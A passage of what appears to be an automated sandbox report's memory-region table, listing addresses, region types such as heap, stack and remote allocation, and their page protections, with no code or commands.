page read and write
|
||
|
24A7E688000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
19698599000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
4F46000
|
heap
|
page read and write
|
||
|
196B0637000
|
heap
|
page execute and read and write
|
||
|
5CB030B000
|
stack
|
page read and write
|
||
|
24A7E511000
|
heap
|
page read and write
|
||
|
87F000
|
unkown
|
page read and write
|
||
|
24A7E76B000
|
heap
|
page read and write
|
||
|
23401000
|
heap
|
page read and write
|
||
|
7FFB4AE60000
|
trusted library allocation
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page readonly
|
||
|
4270000
|
trusted library allocation
|
page read and write
|
||
|
24A7C732000
|
heap
|
page read and write
|
||
|
5127000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
23573000
|
heap
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
7F00000
|
heap
|
page read and write
|
||
|
19699EA4000
|
trusted library allocation
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
430E000
|
stack
|
page read and write
|
||
|
4F69000
|
heap
|
page read and write
|
||
|
24A7C630000
|
heap
|
page read and write
|
||
|
24A7C75E000
|
heap
|
page read and write
|
||
|
4F28000
|
heap
|
page read and write
|
||
|
196A83FD000
|
trusted library allocation
|
page read and write
|
||
|
19696750000
|
heap
|
page read and write
|
||
|
4F77000
|
heap
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
6E5A000
|
heap
|
page read and write
|
||
|
364C000
|
heap
|
page read and write
|
||
|
6EF3000
|
heap
|
page read and write
|
||
|
6704000
|
remote allocation
|
page execute and read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
6ED0000
|
heap
|
page read and write
|
||
|
49F9000
|
heap
|
page read and write
|
||
|
24A7E53B000
|
heap
|
page read and write
|
||
|
5CAF2F8000
|
stack
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
B3302FB000
|
stack
|
page read and write
|
||
|
55D000
|
stack
|
page read and write
|
||
|
364C000
|
heap
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
4F86000
|
heap
|
page read and write
|
||
|
7F0000
|
trusted library section
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
10E000
|
stack
|
page read and write
|
||
|
24A7E0A0000
|
remote allocation
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
7FFB4AF00000
|
trusted library allocation
|
page read and write
|
||
|
4F58000
|
heap
|
page read and write
|
||
|
196B0808000
|
heap
|
page read and write
|
||
|
A784000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
|
B32FCFE000
|
stack
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
764000
|
heap
|
page read and write
|
||
|
873000
|
trusted library allocation
|
page execute and read and write
|
||
|
6A7B000
|
stack
|
page read and write
|
||
|
343E000
|
unkown
|
page read and write
|
||
|
B3303FE000
|
stack
|
page read and write
|
||
|
24A7E7C3000
|
heap
|
page read and write
|
||
|
8280000
|
direct allocation
|
page read and write
|
||
|
24A7E520000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
2F23000
|
heap
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
7CE5000
|
trusted library allocation
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
79C000
|
stack
|
page read and write
|
||
|
7FFB4AE10000
|
trusted library allocation
|
page read and write
|
||
|
7E3B000
|
stack
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
23761000
|
heap
|
page read and write
|
||
|
4F35000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
419F000
|
stack
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
24A7C70A000
|
heap
|
page read and write
|
||
|
4E2B000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
|
23756000
|
heap
|
page read and write
|
||
|
40EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A7E684000
|
heap
|
page read and write
|
||
|
315B000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
4D45000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
24A7E55A000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
24A7E732000
|
heap
|
page read and write
|
||
|
24A7C680000
|
heap
|
page read and write
|
||
|
87D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
19698195000
|
trusted library allocation
|
page read and write
|
||
|
196B0517000
|
heap
|
page read and write
|
||
|
7F1C000
|
heap
|
page read and write
|
||
|
24A7E63D000
|
heap
|
page read and write
|
||
|
24A7C776000
|
heap
|
page read and write
|
||
|
434E000
|
stack
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
24A7C9E5000
|
heap
|
page read and write
|
||
|
24A7C76A000
|
heap
|
page read and write
|
||
|
8180000
|
trusted library allocation
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
19698CB8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
82C0000
|
direct allocation
|
page read and write
|
||
|
4B47000
|
trusted library allocation
|
page read and write
|
||
|
81CE000
|
stack
|
page read and write
|
||
|
5CB018E000
|
stack
|
page read and write
|
||
|
6E19000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
4936000
|
heap
|
page read and write
|
||
|
21B959C0000
|
heap
|
page read and write
|
||
|
7FFB4AC12000
|
trusted library allocation
|
page read and write
|
||
|
4F58000
|
heap
|
page read and write
|
||
|
55EB000
|
trusted library allocation
|
page read and write
|
||
|
7F640000
|
trusted library allocation
|
page execute and read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
6F10000
|
heap
|
page execute and read and write
|
||
|
19699EB1000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
direct allocation
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
196985A9000
|
trusted library allocation
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
7FFB4AEC0000
|
trusted library allocation
|
page read and write
|
||
|
24A7E717000
|
heap
|
page read and write
|
||
|
196B053E000
|
heap
|
page read and write
|
||
|
23C10000
|
heap
|
page read and write
|
||
|
23B93000
|
unclassified section
|
page execute and read and write
|
||
|
196B07FC000
|
heap
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
23BFC000
|
unclassified section
|
page execute and read and write
|
||
|
19699EC7000
|
trusted library allocation
|
page read and write
|
||
|
5475000
|
heap
|
page read and write
|
||
|
7F42000
|
heap
|
page read and write
|
||
|
7104000
|
remote allocation
|
page execute and read and write
|
||
|
6C7E000
|
stack
|
page read and write
|
||
|
24A7C75E000
|
heap
|
page read and write
|
||
|
6D0000
|
direct allocation
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
196B081A000
|
heap
|
page read and write
|
||
|
22C6E000
|
stack
|
page read and write
|
||
|
4936000
|
heap
|
page read and write
|
||
|
640000
|
direct allocation
|
page read and write
|
||
|
24A7C715000
|
heap
|
page read and write
|
||
|
BC0000
|
direct allocation
|
page read and write
|
||
|
7B9D000
|
stack
|
page read and write
|
||
|
23481000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
7E40000
|
heap
|
page read and write
|
||
|
889000
|
trusted library allocation
|
page read and write
|
||
|
47C000
|
stack
|
page read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
7D2000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
4F5C000
|
heap
|
page read and write
|
||
|
24A7E65C000
|
heap
|
page read and write
|
||
|
2302C000
|
stack
|
page read and write
|
||
|
24A7C757000
|
heap
|
page read and write
|
||
|
24A7C71C000
|
heap
|
page read and write
|
||
|
40F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
6F7E000
|
stack
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
5CAEF7E000
|
stack
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
7DA000
|
stack
|
page read and write
|
||
|
3157000
|
heap
|
page read and write
|
||
|
196B04B8000
|
heap
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
|
6FFE000
|
stack
|
page read and write
|
||
|
230EF000
|
stack
|
page read and write
|
||
|
4F86000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
5CB020D000
|
stack
|
page read and write
|
||
|
2CDA000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
364D000
|
heap
|
page read and write
|
||
|
68E0000
|
direct allocation
|
page read and write
|
||
|
21B95A10000
|
heap
|
page read and write
|
||
|
24A7E662000
|
heap
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
80B000
|
heap
|
page read and write
|
||
|
4380000
|
heap
|
page read and write
|
||
|
21B95A19000
|
heap
|
page read and write
|
||
|
1969A09B000
|
trusted library allocation
|
page read and write
|
||
|
19698C8F000
|
trusted library allocation
|
page read and write
|
||
|
810000
|
trusted library allocation
|
page read and write
|
||
|
874000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF10000
|
trusted library allocation
|
page read and write
|
||
|
2F2C000
|
heap
|
page read and write
|
||
|
820C000
|
stack
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
528000
|
heap
|
page read and write
|
||
|
7FFB4ACCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2344A000
|
heap
|
page read and write
|
||
|
7FFB4ADF2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD30000
|
trusted library allocation
|
page execute and read and write
|
||
|
4904000
|
remote allocation
|
page execute and read and write
|
||
|
2D1E000
|
heap
|
page read and write
|
||
|
19699755000
|
trusted library allocation
|
page read and write
|
||
|
4930000
|
heap
|
page read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page read and write
|
||
|
23481000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
24A7C6AE000
|
heap
|
page read and write
|
||
|
40F0000
|
trusted library allocation
|
page read and write
|
||
|
4550000
|
direct allocation
|
page read and write
|
||
|
19698CA3000
|
trusted library allocation
|
page read and write
|
||
|
24A7C9EA000
|
heap
|
page read and write
|
||
|
40DF000
|
stack
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
5CAEFFE000
|
stack
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
24A7E626000
|
heap
|
page read and write
|
||
|
2F2E000
|
heap
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
697A000
|
stack
|
page read and write
|
||
|
4110000
|
trusted library allocation
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
4560000
|
direct allocation
|
page read and write
|
||
|
19696760000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
4900000
|
heap
|
page read and write
|
||
|
235EC000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
22F60000
|
remote allocation
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
30FF000
|
stack
|
page read and write
|
||
|
7FFB4AEE0000
|
trusted library allocation
|
page read and write
|
||
|
7BDE000
|
stack
|
page read and write
|
||
|
24A7E670000
|
heap
|
page read and write
|
||
|
5CAF53E000
|
stack
|
page read and write
|
||
|
24A7E642000
|
heap
|
page read and write
|
||
|
196B0787000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
24A7C776000
|
heap
|
page read and write
|
||
|
23750000
|
heap
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
68D0000
|
direct allocation
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
23440000
|
heap
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
24A7E642000
|
heap
|
page read and write
|
||
|
50BCE7F000
|
stack
|
page read and write
|
||
|
24A7E72C000
|
heap
|
page read and write
|
||
|
7FFB4AC14000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE40000
|
trusted library allocation
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
821000
|
heap
|
page read and write
|
||
|
24A7E670000
|
heap
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
24A7E732000
|
heap
|
page read and write
|
||
|
4F22000
|
heap
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
315B000
|
heap
|
page read and write
|
||
|
41C0000
|
heap
|
page read and write
|
||
|
880000
|
trusted library allocation
|
page read and write
|
||
|
69BE000
|
stack
|
page read and write
|
||
|
24A7E0D0000
|
heap
|
page read and write
|
||
|
41C8000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
A2F000
|
stack
|
page read and write
|
||
|
5CAF07F000
|
stack
|
page read and write
|
||
|
4F86000
|
heap
|
page read and write
|
||
|
47D8000
|
heap
|
page read and write
|
||
|
5FD000
|
heap
|
page read and write
|
||
|
24A7C75E000
|
heap
|
page read and write
|
||
|
7C5000
|
heap
|
page read and write
|
||
|
24A7E6CD000
|
heap
|
page read and write
|
||
|
24A7E7C6000
|
heap
|
page read and write
|
||
|
24A7E642000
|
heap
|
page read and write
|
||
|
B3306FC000
|
stack
|
page read and write
|
||
|
4BD000
|
stack
|
page read and write
|
||
|
4931000
|
heap
|
page read and write
|
||
|
196986CB000
|
trusted library allocation
|
page read and write
|
||
|
870000
|
trusted library allocation
|
page read and write
|
||
|
5D5000
|
heap
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page execute and read and write
|
||
|
19696690000
|
trusted library allocation
|
page read and write
|
||
|
693E000
|
stack
|
page read and write
|
||
|
7FFB4ACD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2343D000
|
heap
|
page read and write
|
||
|
19696700000
|
trusted library allocation
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
4D4B000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
196B07A8000
|
heap
|
page read and write
|
||
|
24A7E523000
|
heap
|
page read and write
|
||
|
580000
|
direct allocation
|
page read and write
|
||
|
5CAF33E000
|
stack
|
page read and write
|
||
|
22CCE000
|
stack
|
page read and write
|
||
|
24A7C74D000
|
heap
|
page read and write
|
||
|
4F46000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
22A5D000
|
stack
|
page read and write
|
||
|
24A7E662000
|
heap
|
page read and write
|
||
|
1969660F000
|
heap
|
page read and write
|
||
|
230AB000
|
stack
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page read and write
|
||
|
77E000
|
stack
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
4938000
|
heap
|
page read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
19696510000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
4F34000
|
heap
|
page read and write
|
||
|
235EC000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
8DF000
|
stack
|
page read and write
|
||
|
B32F9D9000
|
stack
|
page read and write
|
||
|
24A7E610000
|
heap
|
page read and write
|
||
|
24A7E720000
|
heap
|
page read and write
|
||
|
670000
|
direct allocation
|
page read and write
|
||
|
24A7E65C000
|
heap
|
page read and write
|
||
|
7FFB4AE00000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
5F7000
|
heap
|
page read and write
|
||
|
4520000
|
heap
|
page execute and read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
5CAF3B7000
|
stack
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
196A8120000
|
trusted library allocation
|
page read and write
|
||
|
821000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
23B7D000
|
unclassified section
|
page execute and read and write
|
||
|
4929000
|
heap
|
page read and write
|
||
|
19698CBF000
|
trusted library allocation
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F64000
|
heap
|
page read and write
|
||
|
23430000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
8C7000
|
stack
|
page read and write
|
||
|
4F5C000
|
heap
|
page read and write
|
||
|
24A7E711000
|
heap
|
page read and write
|
||
|
2326F000
|
stack
|
page read and write
|
||
|
196A8111000
|
trusted library allocation
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
2D16000
|
heap
|
page read and write
|
||
|
4F4A000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
4931000
|
heap
|
page read and write
|
||
|
88F0000
|
direct allocation
|
page execute and read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
660000
|
direct allocation
|
page read and write
|
||
|
196985A5000
|
trusted library allocation
|
page read and write
|
||
|
2312C000
|
stack
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
5CAF0FD000
|
stack
|
page read and write
|
||
|
196B07C3000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC20000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
trusted library allocation
|
page read and write
|
||
|
21B959B0000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
7FFB4AE20000
|
trusted library allocation
|
page read and write
|
||
|
5CAF63E000
|
stack
|
page read and write
|
||
|
23756000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
196B0466000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
24A7E69F000
|
heap
|
page read and write
|
||
|
4F57000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
6CE000
|
unkown
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
24A7C746000
|
heap
|
page read and write
|
||
|
4E21000
|
heap
|
page read and write
|
||
|
24A7C70C000
|
heap
|
page read and write
|
||
|
526C000
|
heap
|
page read and write
|
||
|
196996C4000
|
trusted library allocation
|
page read and write
|
||
|
5CAF27E000
|
stack
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
196B078E000
|
heap
|
page read and write
|
||
|
231AD000
|
stack
|
page read and write
|
||
|
19699EB5000
|
trusted library allocation
|
page read and write
|
||
|
19698105000
|
heap
|
page read and write
|
||
|
943000
|
heap
|
page read and write
|
||
|
22F60000
|
remote allocation
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
800000
|
trusted library section
|
page read and write
|
||
|
24A7E710000
|
heap
|
page read and write
|
||
|
22FDF000
|
stack
|
page read and write
|
||
|
24A7E65C000
|
heap
|
page read and write
|
||
|
24A7E631000
|
heap
|
page read and write
|
||
|
5CAF4B9000
|
stack
|
page read and write
|
||
|
233F8000
|
heap
|
page read and write
|
||
|
4F35000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
5AF000
|
heap
|
page read and write
|
||
|
24A7E514000
|
heap
|
page read and write
|
||
|
23380000
|
heap
|
page read and write
|
||
|
24A7C71C000
|
heap
|
page read and write
|
||
|
4B9000
|
stack
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
19696570000
|
trusted library allocation
|
page read and write
|
||
|
24A7C650000
|
heap
|
page read and write
|
||
|
19696680000
|
heap
|
page readonly
|
||
|
24A7E719000
|
heap
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
22C2E000
|
stack
|
page read and write
|
||
|
525F000
|
heap
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE50000
|
trusted library allocation
|
page read and write
|
||
|
24A7E55A000
|
heap
|
page read and write
|
||
|
4540000
|
direct allocation
|
page read and write
|
||
|
19699FA8000
|
trusted library allocation
|
page read and write
|
||
|
5CB028A000
|
stack
|
page read and write
|
||
|
7FFB4ACC6000
|
trusted library allocation
|
page read and write
|
||
|
24A7E55A000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
24A7E642000
|
heap
|
page read and write
|
||
|
8250000
|
direct allocation
|
page read and write
|
||
|
24A7E51C000
|
heap
|
page read and write
|
||
|
24A7E670000
|
heap
|
page read and write
|
||
|
24A7E625000
|
heap
|
page read and write
|
||
|
AB4000
|
heap
|
page read and write
|
||
|
5CAF5BE000
|
stack
|
page read and write
|
||
|
826000
|
heap
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
24A7E723000
|
heap
|
page read and write
|
||
|
6EC6000
|
heap
|
page read and write
|
||
|
BEF000
|
unkown
|
page read and write
|
||
|
19696550000
|
trusted library allocation
|
page read and write
|
||
|
24A7E76B000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
24A7C6FC000
|
heap
|
page read and write
|
||
|
2316F000
|
stack
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
24A7E0A0000
|
remote allocation
|
page read and write
|
||
|
86E000
|
stack
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
7DF4C8790000
|
trusted library allocation
|
page execute and read and write
|
||
|
196965D1000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
4530000
|
direct allocation
|
page read and write
|
||
|
4F86000
|
heap
|
page read and write
|
||
|
22E70000
|
heap
|
page read and write
|
||
|
24A7E69F000
|
heap
|
page read and write
|
||
|
41A0000
|
heap
|
page readonly
|
||
|
4992000
|
heap
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
19698090000
|
heap
|
page execute and read and write
|
||
|
73A000
|
heap
|
page read and write
|
||
|
4936000
|
heap
|
page read and write
|
||
|
96A7000
|
trusted library allocation
|
page read and write
|
||
|
24A7C6C9000
|
heap
|
page read and write
|
||
|
451B000
|
stack
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page read and write
|
||
|
24A7E638000
|
heap
|
page read and write
|
||
|
4F52000
|
heap
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
24A7C9E8000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
24A7E52F000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
7EE0000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
24A7E7BE000
|
heap
|
page read and write
|
||
|
24A7C732000
|
heap
|
page read and write
|
||
|
24A7E511000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
24A7E73D000
|
heap
|
page read and write
|
||
|
4F42000
|
heap
|
page read and write
|
||
|
24A7E631000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
19699E92000
|
trusted library allocation
|
page read and write
|
||
|
24A7E0A0000
|
remote allocation
|
page read and write
|
||
|
7FFB4AC13000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A7E71C000
|
heap
|
page read and write
|
||
|
4941000
|
heap
|
page read and write
|
||
|
5304000
|
remote allocation
|
page execute and read and write
|
||
|
576000
|
heap
|
page read and write
|
||
|
4F38000
|
heap
|
page read and write
|
||
|
4F46000
|
heap
|
page read and write
|
||
|
718C000
|
stack
|
page read and write
|
||
|
55A9000
|
trusted library allocation
|
page read and write
|
||
|
6F20000
|
trusted library allocation
|
page read and write
|
||
|
24A7E713000
|
heap
|
page read and write
|
||
|
21B95C50000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
613000
|
heap
|
page read and write
|
||
|
70E0000
|
trusted library allocation
|
page read and write
|
||
|
24A7E6F1000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
BCD000
|
unkown
|
page read and write
|
||
|
40F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
5581000
|
trusted library allocation
|
page read and write
|
||
|
6B0000
|
direct allocation
|
page read and write
|
||
|
24A7E68D000
|
heap
|
page read and write
|
||
|
24A7C9E0000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
710000
|
direct allocation
|
page read and write
|
||
|
24A7C70A000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
|
650000
|
direct allocation
|
page read and write
|
||
|
4B4D000
|
trusted library allocation
|
page read and write
|
||
|
5256000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
24A7E55A000
|
heap
|
page read and write
|
||
|
4992000
|
heap
|
page read and write
|
||
|
363F000
|
unkown
|
page read and write
|
||
|
7B17000
|
stack
|
page read and write
|
||
|
4F4A000
|
heap
|
page read and write
|
||
|
A30000
|
heap
|
page readonly
|
||
|
24A7E528000
|
heap
|
page read and write
|
||
|
6FBE000
|
stack
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
8290000
|
direct allocation
|
page read and write
|
||
|
4936000
|
heap
|
page read and write
|
||
|
24A7E7BE000
|
heap
|
page read and write
|
||
|
22A9D000
|
stack
|
page read and write
|
||
|
24A7E510000
|
heap
|
page read and write
|
||
|
4FD000
|
stack
|
page read and write
|
||
|
5CB010E000
|
stack
|
page read and write
|
||
|
196B04A8000
|
heap
|
page read and write
|
||
|
24A7E680000
|
heap
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
196B0740000
|
heap
|
page read and write
|
||
|
24A7C9EA000
|
heap
|
page read and write
|
||
|
7F32000
|
heap
|
page read and write
|
||
|
22DE0000
|
direct allocation
|
page read and write
|
||
|
344A000
|
heap
|
page read and write
|
||
|
BB84000
|
direct allocation
|
page execute and read and write
|
||
|
7D2000
|
heap
|
page read and write
|
||
|
81D000
|
heap
|
page read and write
|
||
|
24A7E55A000
|
heap
|
page read and write
|
||
|
4F52000
|
heap
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
6F28000
|
trusted library allocation
|
page read and write
|
||
|
6E7F000
|
heap
|
page read and write
|
||
|
4F28000
|
heap
|
page read and write
|
||
|
422C000
|
stack
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
4F6E000
|
heap
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
24A7E73A000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
23760000
|
heap
|
page read and write
|
||
|
24A7E534000
|
heap
|
page read and write
|
||
|
45DA000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
stack
|
page read and write
|
||
|
232E6000
|
direct allocation
|
page execute and read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
7B04000
|
remote allocation
|
page execute and read and write
|
||
|
24A7C6E6000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
4F6D000
|
heap
|
page read and write
|
||
|
